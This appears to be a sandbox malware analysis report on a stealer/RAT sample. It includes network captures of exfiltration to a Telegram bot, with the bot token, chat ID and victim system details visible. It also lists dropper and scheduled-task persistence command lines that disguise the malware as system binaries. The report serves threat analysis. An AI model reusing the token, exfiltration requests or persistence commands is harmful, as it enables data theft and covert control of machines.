                                                                                                                  Date: Wed, 01 Jan 2025 15:04:01 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=EiJmszx2bJ2oH14GHDRgTLGU5h3RAWymH1cbm5LZMoaOxfXs%2FR6pDaublGWDRSNNEtZzHgCbWbBT68IByNYvcEB7JBOmfIgLmy%2F4nON0vaezm8gMp%2BkQVgsF56h478SfDn3YcnwW"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb3663ddc9e42fe-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=3701&min_rtt=2493&rtt_var=3351&sent=4&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=1402&delivery_rate=120075&cwnd=68&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 32 57 5c 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 42W\X0


                                                                                                                  HTTPS Proxied Packets

                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  0192.168.2.64971034.117.59.814433084C:\Drivers\fontdrvhost.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  2025-01-01 15:02:08 UTC61OUTGET /ip HTTP/1.1
                                                                                                                  Host: ipinfo.io
                                                                                                                  Connection: Keep-Alive
                                                                                                                  2025-01-01 15:02:09 UTC305INHTTP/1.1 200 OK
                                                                                                                  date: Wed, 01 Jan 2025 15:02:08 GMT
                                                                                                                  content-type: text/plain; charset=utf-8
                                                                                                                  Content-Length: 12
                                                                                                                  access-control-allow-origin: *
                                                                                                                  via: 1.1 google
                                                                                                                  strict-transport-security: max-age=2592000; includeSubDomains
                                                                                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                  Connection: close
                                                                                                                  2025-01-01 15:02:09 UTC12INData Raw: 38 2e 34 36 2e 31 32 33 2e 31 38 39
                                                                                                                  Data Ascii: 8.46.123.189


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  1192.168.2.64971134.117.59.814433084C:\Drivers\fontdrvhost.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  2025-01-01 15:02:09 UTC42OUTGET /country HTTP/1.1
                                                                                                                  Host: ipinfo.io
                                                                                                                  2025-01-01 15:02:09 UTC448INHTTP/1.1 200 OK
                                                                                                                  access-control-allow-origin: *
                                                                                                                  Content-Length: 3
                                                                                                                  content-type: text/html; charset=utf-8
                                                                                                                  date: Wed, 01 Jan 2025 15:02:09 GMT
                                                                                                                  referrer-policy: strict-origin-when-cross-origin
                                                                                                                  x-content-type-options: nosniff
                                                                                                                  x-frame-options: SAMEORIGIN
                                                                                                                  x-xss-protection: 1; mode=block
                                                                                                                  via: 1.1 google
                                                                                                                  strict-transport-security: max-age=2592000; includeSubDomains
                                                                                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                  Connection: close
                                                                                                                  2025-01-01 15:02:09 UTC3INData Raw: 55 53 0a
                                                                                                                  Data Ascii: US


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  2192.168.2.649712149.154.167.2204433084C:\Drivers\fontdrvhost.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  2025-01-01 15:02:10 UTC255OUTPOST /bot8143016568:AAEvmfltzzwYHiQ7qyRFPs1EAB_RQhZk4kg/sendPhoto HTTP/1.1
                                                                                                                  Content-Type: multipart/form-data; boundary="41e39329-f7ed-4a24-a87a-8d5d41ec4466"
                                                                                                                  Host: api.telegram.org
                                                                                                                  Content-Length: 86650
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
                                                                                                                  2025-01-01 15:02:10 UTC25INHTTP/1.1 100 Continue
                                                                                                                  2025-01-01 15:02:10 UTC40OUTData Raw: 2d 2d 34 31 65 33 39 33 32 39 2d 66 37 65 64 2d 34 61 32 34 2d 61 38 37 61 2d 38 64 35 64 34 31 65 63 34 34 36 36 0d 0a
                                                                                                                  Data Ascii: --41e39329-f7ed-4a24-a87a-8d5d41ec4466
                                                                                                                  2025-01-01 15:02:10 UTC89OUTData Raw: 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 70 6c 61 69 6e 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 63 68 61 74 5f 69 64 0d 0a 0d 0a
                                                                                                                  Data Ascii: Content-Type: text/plain; charset=utf-8Content-Disposition: form-data; name=chat_id
                                                                                                                  2025-01-01 15:02:10 UTC10OUTData Raw: 36 32 38 33 33 37 33 34 34 32
                                                                                                                  Data Ascii: 6283373442
                                                                                                                  2025-01-01 15:02:10 UTC131OUTData Raw: 0d 0a 2d 2d 34 31 65 33 39 33 32 39 2d 66 37 65 64 2d 34 61 32 34 2d 61 38 37 61 2d 38 64 35 64 34 31 65 63 34 34 36 36 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 70 6c 61 69 6e 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 63 61 70 74 69 6f 6e 0d 0a 0d 0a
                                                                                                                  Data Ascii: --41e39329-f7ed-4a24-a87a-8d5d41ec4466Content-Type: text/plain; charset=utf-8Content-Disposition: form-data; name=caption
                                                                                                                  2025-01-01 15:02:10 UTC143OUTData Raw: 6e 65 77 20 75 73 65 72 20 63 6f 6e 6e 65 63 74 20 21 0a 49 44 3a 20 61 33 31 35 30 33 31 34 33 31 31 61 38 34 39 36 62 32 35 65 37 30 34 30 35 63 36 35 36 66 61 32 33 36 32 33 65 34 65 35 0a 43 6f 6d 6d 65 6e 74 3a 20 4e 45 57 4f 52 4b 20 50 43 0a 55 73 65 72 6e 61 6d 65 3a 20 65 6e 67 69 6e 65 65 72 0a 50 43 20 4e 61 6d 65 3a 20 31 33 38 37 32 37 0a 49 50 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0a 47 45 4f 3a 20 55 53 0a
                                                                                                                  Data Ascii: new user connect !ID: a3150314311a8496b25e70405c656fa23623e4e5Comment: NEWORK PCUsername: userPC Name: 138727IP: 8.46.123.189GEO: US
                                                                                                                  2025-01-01 15:02:10 UTC146OUTData Raw: 0d 0a 2d 2d 34 31 65 33 39 33 32 39 2d 66 37 65 64 2d 34 61 32 34 2d 61 38 37 61 2d 38 64 35 64 34 31 65 63 34 34 36 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 70 68 6f 74 6f 3b 20 66 69 6c 65 6e 61 6d 65 3d 73 63 72 65 65 6e 73 68 6f 74 2e 70 6e 67 3b 20 66 69 6c 65 6e 61 6d 65 2a 3d 75 74 66 2d 38 27 27 73 63 72 65 65 6e 73 68 6f 74 2e 70 6e 67 0d 0a 0d 0a
                                                                                                                  Data Ascii: --41e39329-f7ed-4a24-a87a-8d5d41ec4466Content-Disposition: form-data; name=photo; filename=screenshot.png; filename*=utf-8''screenshot.png
                                                                                                                  2025-01-01 15:02:10 UTC4096OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d 38 32 3c 2e 33 34 32 ff db 00 43 01 09 09 09 0c 0b 0c 18 0d 0d 18 32 21 1c 21 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 ff c0 00 11 08 04 00 05 00 03 01 22 00 02 11 01 03 11 01 ff c4 00 1f 00 00 01 05 01 01 01 01 01 01 00 00 00 00 00 00 00 00 01 02 03 04 05 06 07 08 09 0a 0b ff c4 00 b5 10 00 02 01 03 03 02 04 03 05 05 04 04 00 00 01 7d 01 02 03 00 04 11 05 12 21 31 41 06 13 51 61 07 22 71 14 32 81 91 a1 08
                                                                                                                  Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"}!1AQa"q2
                                                                                                                  2025-01-01 15:02:10 UTC4096OUTData Raw: e3 75 fd 35 b4 bf 01 6a 50 32 58 29 69 11 f1 63 69 f6 74 fb e8 39 5d cd 93 c7 5c fa 7a 57 95 d7 b2 f8 e3 fe 44 eb ff 00 fb 67 ff 00 a3 16 bc 6e bd 5c 99 b9 42 6d f7 3e 7f 3f 49 54 82 5d 84 a2 83 45 7b 27 80 14 94 b4 94 00 52 62 96 8a 06 25 14 1a 28 00 a4 e6 96 90 d3 18 52 52 d1 40 09 45 2e 29 28 18 94 52 e2 92 80 13 bd 14 77 a2 81 85 06 8a 28 01 28 a2 8a 06 21 a4 a7 52 1a 00 29 29 68 34 00 dc 51 4b 45 03 12 92 96 8a 06 25 14 51 40 09 45 06 8a 07 71 0d 26 29 d4 94 0c 4a 29 69 28 04 18 a4 a5 a0 d0 31 b8 a2 96 8a 00 4c 52 52 d1 40 c6 9a 29 4d 25 03 0a 4a 5a 4a 60 14 98 a5 a4 a4 30 34 94 b4 94 0c 4a 29 69 28 00 a4 22 96 8a 06 34 8a 29 69 28 18 94 77 a5 34 94 0c 4a 31 4b 48 68 18 84 52 1a 71 a4 a0 04 fa d2 52 91 49 8e 28 18 99 a3 8e b4 b4 94 14 25 25 38 d2 0a
                                                                                                                  Data Ascii: u5jP2X)icit9]\zWDgn\Bm>?IT]E{'Rb%(RR@E.)(Rw((!R))h4QKE%Q@Eq&)J)i(1LRR@)M%JZJ`04J)i("4)i(w4J1KHhRqRI(%%8
                                                                                                                  2025-01-01 15:02:10 UTC4096OUTData Raw: 56 12 ca 29 b4 d2 7a bb fe 37 d3 f1 67 4c 73 ca a9 ea ae b4 fc 2d fe 46 5d 88 d3 61 d2 6c ed 75 9d 4a 0b dd 8d 6e 91 49 1d b4 9f 69 b7 84 12 d2 46 ee 50 65 71 f2 aa 82 e0 12 31 80 0d 4c 9a b6 9b 25 cd ad f4 d6 f7 d6 32 c7 ae 45 a9 96 b8 9f ed 21 91 9c 79 ca a1 22 5d a0 05 46 c1 cf dd c0 e7 ad ef 2a 3c e7 cb 4f fb e6 94 c6 8c 30 ca a4 0f 51 49 e5 31 7a f3 7f 5a 7f 90 d6 77 35 f6 17 9f e3 fe 67 3b 75 75 71 36 9d aa 4b 34 56 6b 35 c5 a9 8a dc 5b d9 a4 21 db ed 31 48 03 08 d1 7f 85 09 c9 f4 ab b3 4b a7 a5 f6 a3 af c5 70 1e e6 e9 67 96 3b 03 13 99 92 69 51 94 ab 92 bb 36 29 66 39 0c 49 00 70 09 38 d4 d8 98 03 62 f1 d3 8a 3c a8 f3 9d 8b 9f 5c 50 f2 88 5a ca 5d 2d fe 7f 78 2c f2 a7 58 a7 ad fe 7f f0 0a 76 c2 d9 be cd 75 16 a1 6c f2 2e 9f 6b 6e f6 db 26 59 55 d2
                                                                                                                  Data Ascii: V)z7gLs-F]aluJnIiFPeq1L%2E!y"]F*<O0QI1zZw5g;uuq6K4Vk5[!1HKpg;iQ6)f9Ip8b<\PZ]-x,Xvul.kn&YU
                                                                                                                  2025-01-01 15:02:10 UTC4096OUTData Raw: af ce f2 57 45 e2 6a 2a db 35 6f 9d d1 fa 4e 62 ab 2a 10 74 77 4f f4 3a b9 05 bb 78 55 be d4 11 ad c5 b8 67 dc 32 30 00 39 aa f7 a2 51 e0 69 cc d9 f3 4d 90 2f 9f 5d 83 3f ad 4d 6d a6 81 e1 4b 4d 3a fe 30 c6 38 61 49 53 39 04 ae de 3d c6 45 4d e2 1f f9 16 b5 1f fa e0 df ca bd 08 49 2a 8a 2b f9 8c aa c5 fb 29 49 ff 00 2f e8 78 cd 14 51 5f 68 7e 78 14 51 45 00 67 ea ff 00 f1 e8 bf f5 d0 7f 23 5d ae 8f af e9 f1 fc 35 69 26 bc 85 75 4b 2b 7b 8b 48 22 69 00 90 89 0a e1 95 7a 9c 0c 7e 46 b9 3b cb 6f b5 44 23 df b7 0d 9c e3 35 b3 e1 cf 86 ff 00 f0 90 69 f2 5d 7f 6b 7d 9f 64 c6 2d bf 66 dd 9c 00 73 9d c3 d6 bc fc 72 a4 a2 a5 55 d9 5f fa 47 d0 e4 f5 1b 8b a7 4f 59 6b fa 1a 7a c7 88 34 d9 be 1b 24 d1 5d 42 da b5 e5 b5 bd 94 f1 89 41 90 2c 6c c4 92 bd 46 79 e7 dc 7b
                                                                                                                  Data Ascii: WEj*5oNb*twO:xUg209QiM/]?MmKM:08aIS9=EMI*+)I/xQ_h~xQEg#]5i&uK+{H"iz~F;oD#5i]k}d-fsrU_GOYkz4$]BA,lFy{
                                                                                                                  2025-01-01 15:02:11 UTC1587INHTTP/1.1 200 OK
                                                                                                                  Server: nginx/1.18.0
                                                                                                                  Date: Wed, 01 Jan 2025 15:02:11 GMT
                                                                                                                  Content-Type: application/json
                                                                                                                  Content-Length: 1198
                                                                                                                  Connection: close
                                                                                                                  Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                  Access-Control-Allow-Origin: *
                                                                                                                  Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                  Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                  {"ok":true,"result":{"message_id":821,"from":{"id":8143016568,"is_bot":true,"first_name":"\u0411\u041e\u0422\u0418\u041a","username":"Heusjsjs628_bot"},"chat":{"id":6283373442,"first_name":"Loftan","username":"Lofty_Code","type":"private"},"date":1735743731,"photo":[{"file_id":"AgACAgEAAxkDAAIDNWd1WPPWdzWV5GeFxqTwPqrGfk1tAAKLrDEbCc2pR-wBoY2EERWNAQADAgADcwADNgQ","file_unique_id":"AQADi6wxGwnNqUd4","file_size":1096,"width":90,"height":72},{"file_id":"AgACAgEAAxkDAAIDNWd1WPPWdzWV5GeFxqTwPqrGfk1tAAKLrDEbCc2pR-wBoY2EERWNAQADAgADbQADNgQ","file_unique_id":"AQADi6wxGwnNqUdy","file_size":13991,"width":320,"height":256},{"file_id":"AgACAgEAAxkDAAIDNWd1WPPWdzWV5GeFxqTwPqrGfk1tAAKLrDEbCc2pR-wBoY2EERWNAQADAgADeAADNgQ","file_unique_id":"AQADi6wxGwnNqUd9","file_size":58384,"width":800,"height":640},{"file_id":"AgACAgEAAxkDAAIDNWd1WPPWdzWV5GeFxqTwPqrGfk1tAAKLrDEbCc2pR-wBoY2EERWNAQADAgADeQADNgQ","file_unique_id":"AQADi6wxGwnNqUd-","file_size":86047,"width":1280,"height":1024}],"caption":"new user connect !\nID: a3150314311a84 [TRUNCATED]


                                                                                                                  Statistics

                                                                                                                  CPU Usage

                                                                                                                  Click to jump to process

                                                                                                                  Memory Usage

                                                                                                                  Click to jump to process

                                                                                                                  High Level Behavior Distribution

                                                                                                                  Click to dive into process behavior distribution

                                                                                                                  Behavior

                                                                                                                  Click to jump to process

                                                                                                                  System Behavior

                                                                                                                  General

                                                                                                                  Target ID:0
                                                                                                                  Start time:10:02:00
                                                                                                                  Start date:01/01/2025
                                                                                                                  Path:C:\Users\user\Desktop\eP6sjvTqJa.exe
                                                                                                                  Wow64 process (32bit):true
                                                                                                                  Commandline:"C:\Users\user\Desktop\eP6sjvTqJa.exe"
                                                                                                                  Imagebase:0xb80000
                                                                                                                  File size:2'317'084 bytes
                                                                                                                  MD5 hash:F0944C44A97161524CE95C9F8A2629F9
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Yara matches:
                                                                                                                  • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000003.2112514278.000000000556C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000003.2110949935.0000000006C2F000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                  Reputation:low
                                                                                                                  Has exited:true

                                                                                                                  General

                                                                                                                  Target ID:2
                                                                                                                  Start time:10:02:01
                                                                                                                  Start date:01/01/2025
                                                                                                                  Path:C:\Windows\SysWOW64\wscript.exe
                                                                                                                  Wow64 process (32bit):true
                                                                                                                  Commandline:"C:\Windows\System32\WScript.exe" "C:\Drivers\tovs28pB6Vd1SzaEcRy6OtKi8G4GdEOG4Cet.vbe"
                                                                                                                  Imagebase:0x3d0000
                                                                                                                  File size:147'456 bytes
                                                                                                                  MD5 hash:FF00E0480075B095948000BDC66E81F0
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Reputation:high
                                                                                                                  Has exited:true

                                                                                                                  General

                                                                                                                  Target ID:3
                                                                                                                  Start time:10:02:03
                                                                                                                  Start date:01/01/2025
                                                                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                  Wow64 process (32bit):true
                                                                                                                  Commandline:C:\Windows\system32\cmd.exe /c ""C:\Drivers\SE7AQJDJtAMXQraxpdEvOEZ68dJxrB3UY7MvAzdsW8.bat" "
                                                                                                                  Imagebase:0x1c0000
                                                                                                                  File size:236'544 bytes
                                                                                                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Reputation:high
                                                                                                                  Has exited:true

                                                                                                                  General

                                                                                                                  Target ID:4
                                                                                                                  Start time:10:02:03
                                                                                                                  Start date:01/01/2025
                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                  Imagebase:0x7ff66e660000
                                                                                                                  File size:862'208 bytes
                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Reputation:high
                                                                                                                  Has exited:true

                                                                                                                  General

                                                                                                                  Target ID:5
                                                                                                                  Start time:10:02:03
                                                                                                                  Start date:01/01/2025
                                                                                                                  Path:C:\Drivers\fontdrvhost.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:"C:\/Drivers/fontdrvhost.exe"
                                                                                                                  Imagebase:0x150000
                                                                                                                  File size:1'995'264 bytes
                                                                                                                  MD5 hash:0F52130D0A1ABBE40D9F582B1F95A3E3
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Yara matches:
                                                                                                                  • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000005.00000000.2139475451.0000000000152000.00000002.00000001.01000000.0000000A.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000005.00000002.2222372567.00000000128A0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Drivers\fontdrvhost.exe, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Drivers\fontdrvhost.exe, Author: Joe Security
                                                                                                                  Antivirus matches:
                                                                                                                  • Detection: 100%, Avira
                                                                                                                  • Detection: 100%, Joe Sandbox ML
                                                                                                                  • Detection: 76%, ReversingLabs
                                                                                                                  Reputation:low
                                                                                                                  Has exited:true

                                                                                                                  General

                                                                                                                  Target ID:6
                                                                                                                  Start time:10:02:06
                                                                                                                  Start date:01/01/2025
                                                                                                                  Path:C:\Windows\System32\schtasks.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:schtasks.exe /create /tn "AdbXCBUViTnoVBSsOqA" /sc MINUTE /mo 5 /tr "'C:\Windows\IME\IMEKR\AdbXCBUViTnoVBSsOq.exe'" /f
                                                                                                                  Imagebase:0x7ff6c8280000
                                                                                                                  File size:235'008 bytes
                                                                                                                  MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Reputation:high
                                                                                                                  Has exited:true

                                                                                                                  General

                                                                                                                  Target ID:7
                                                                                                                  Start time:10:02:06
                                                                                                                  Start date:01/01/2025
                                                                                                                  Path:C:\Windows\System32\schtasks.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:schtasks.exe /create /tn "AdbXCBUViTnoVBSsOq" /sc ONLOGON /tr "'C:\Windows\IME\IMEKR\AdbXCBUViTnoVBSsOq.exe'" /rl HIGHEST /f
                                                                                                                  Imagebase:0x7ff6c8280000
                                                                                                                  File size:235'008 bytes
                                                                                                                  MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Reputation:high
                                                                                                                  Has exited:true

                                                                                                                  General

                                                                                                                  Target ID:8
                                                                                                                  Start time:10:02:06
                                                                                                                  Start date:01/01/2025
                                                                                                                  Path:C:\Windows\System32\schtasks.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:schtasks.exe /create /tn "AdbXCBUViTnoVBSsOqA" /sc MINUTE /mo 11 /tr "'C:\Windows\IME\IMEKR\AdbXCBUViTnoVBSsOq.exe'" /rl HIGHEST /f
                                                                                                                  Imagebase:0x7ff6c8280000
                                                                                                                  File size:235'008 bytes
                                                                                                                  MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Reputation:high
                                                                                                                  Has exited:true

                                                                                                                  General

                                                                                                                  Target ID:9
                                                                                                                  Start time:10:02:06
                                                                                                                  Start date:01/01/2025
                                                                                                                  Path:C:\Windows\System32\schtasks.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 6 /tr "'C:\Program Files\Internet Explorer\en-US\conhost.exe'" /f
                                                                                                                  Imagebase:0x7ff6c8280000
                                                                                                                  File size:235'008 bytes
                                                                                                                  MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Reputation:high
                                                                                                                  Has exited:true

                                                                                                                  General

                                                                                                                  Target ID:10
                                                                                                                  Start time:10:02:06
                                                                                                                  Start date:01/01/2025
                                                                                                                  Path:C:\Windows\System32\schtasks.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:schtasks.exe /create /tn "conhost" /sc ONLOGON /tr "'C:\Program Files\Internet Explorer\en-US\conhost.exe'" /rl HIGHEST /f
                                                                                                                  Imagebase:0x7ff6c8280000
                                                                                                                  File size:235'008 bytes
                                                                                                                  MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Reputation:high
                                                                                                                  Has exited:true

                                                                                                                  General

                                                                                                                  Target ID:11
                                                                                                                  Start time:10:02:07
                                                                                                                  Start date:01/01/2025
                                                                                                                  Path:C:\Windows\System32\schtasks.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 6 /tr "'C:\Program Files\Internet Explorer\en-US\conhost.exe'" /rl HIGHEST /f
                                                                                                                  Imagebase:0x7ff6c8280000
                                                                                                                  File size:235'008 bytes
                                                                                                                  MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Reputation:high
                                                                                                                  Has exited:true

                                                                                                                  General

                                                                                                                  Target ID:12
                                                                                                                  Start time:10:02:07
                                                                                                                  Start date:01/01/2025
                                                                                                                  Path:C:\Windows\System32\schtasks.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:schtasks.exe /create /tn "AdbXCBUViTnoVBSsOqA" /sc MINUTE /mo 9 /tr "'C:\Users\Default User\Local Settings\History\AdbXCBUViTnoVBSsOq.exe'" /f
                                                                                                                  Imagebase:0x7ff6c8280000
                                                                                                                  File size:235'008 bytes
                                                                                                                  MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:true

                                                                                                                  General

                                                                                                                  Target ID:13
                                                                                                                  Start time:10:02:07
                                                                                                                  Start date:01/01/2025
                                                                                                                  Path:C:\Windows\System32\schtasks.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:schtasks.exe /create /tn "AdbXCBUViTnoVBSsOq" /sc ONLOGON /tr "'C:\Users\Default User\Local Settings\History\AdbXCBUViTnoVBSsOq.exe'" /rl HIGHEST /f
                                                                                                                  Imagebase:0x7ff6c8280000
                                                                                                                  File size:235'008 bytes
                                                                                                                  MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:true

                                                                                                                  General

                                                                                                                  Target ID:14
                                                                                                                  Start time:10:02:07
                                                                                                                  Start date:01/01/2025
                                                                                                                  Path:C:\Windows\System32\schtasks.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:schtasks.exe /create /tn "AdbXCBUViTnoVBSsOqA" /sc MINUTE /mo 13 /tr "'C:\Users\Default User\Local Settings\History\AdbXCBUViTnoVBSsOq.exe'" /rl HIGHEST /f
                                                                                                                  Imagebase:0x7ff6c8280000
                                                                                                                  File size:235'008 bytes
                                                                                                                  MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:true

                                                                                                                  General

                                                                                                                  Target ID:15
                                                                                                                  Start time:10:02:07
                                                                                                                  Start date:01/01/2025
                                                                                                                  Path:C:\Windows\System32\schtasks.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:schtasks.exe /create /tn "backgroundTaskHostb" /sc MINUTE /mo 10 /tr "'C:\Users\user\backgroundTaskHost.exe'" /f
                                                                                                                  Imagebase:0x7ff6c8280000
                                                                                                                  File size:235'008 bytes
                                                                                                                  MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:true

                                                                                                                  General

                                                                                                                  Target ID:16
                                                                                                                  Start time:10:02:07
                                                                                                                  Start date:01/01/2025
                                                                                                                  Path:C:\Windows\System32\schtasks.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:schtasks.exe /create /tn "backgroundTaskHost" /sc ONLOGON /tr "'C:\Users\user\backgroundTaskHost.exe'" /rl HIGHEST /f
                                                                                                                  Imagebase:0x7ff6c8280000
                                                                                                                  File size:235'008 bytes
                                                                                                                  MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:true

                                                                                                                  General

                                                                                                                  Target ID:17
                                                                                                                  Start time:10:02:07
                                                                                                                  Start date:01/01/2025
                                                                                                                  Path:C:\Windows\System32\schtasks.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:schtasks.exe /create /tn "backgroundTaskHostb" /sc MINUTE /mo 9 /tr "'C:\Users\user\backgroundTaskHost.exe'" /rl HIGHEST /f
                                                                                                                  Imagebase:0x7ff6c8280000
                                                                                                                  File size:235'008 bytes
                                                                                                                  MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:true

                                                                                                                  General

